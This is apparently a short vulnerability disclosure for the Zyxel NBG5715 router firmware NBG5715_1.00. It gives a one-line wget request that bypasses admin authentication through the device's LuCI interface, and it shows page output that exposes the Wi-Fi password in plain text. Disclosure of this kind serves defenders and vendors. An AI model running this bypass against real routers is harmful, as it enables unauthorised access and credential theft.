|
==================================================================================================
| |
__| | _ __ __ ____ __ _ __ __ ____ __ _ __ __ ____ __
/ _` || '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /
| (_| || | \ V V / > < | | \ V V / > < | | \ V V / > <
\__,_||_| \_/\_/ /_/\_\|_| \_/\_/ /_/\_\|_| \_/\_/ /_/\_\
==================================================================================================
Zyxel NBG5715
Simultaneous Dual-Band Wireless N900 Media Router
Local admin privileges bypass and Local Wireless Plain Text Password Disclosure
Firmware Version Affected: NBG5715_1.00
Release Date: 20 November 2012
Discover: drwxrwxrwx <drwxrwxrwx@linuxmail.org>
Vendor: ZyXEL
Products Affected: NBG5715
==================================================================================================
VULN: Local admin privileges bypass doing wget 192.168.1.1/cgi-bin/luci/;stok=/easy/networkmap#
==================================================================================================
DATA:
<title>.::Welcome to ZyXEL NBG5715::.</title>
with ( document.forms[0] ){
/* 2.4G */
if(wlanRadio.selectedIndex == 0){
wlanSSID.value = "Defaultssid";
wlanSec.selectedIndex = 2;
wlanPwd.value = "thedefaultpassword";
}
else{ /* 5G */
wlanSSID.value = "Defaultssid";
wlanSec.selectedIndex = 2;
wlanPwd.value = "thedefaultpassword";
}
changeSec();
}
}
==================================================================================================
Gretz
|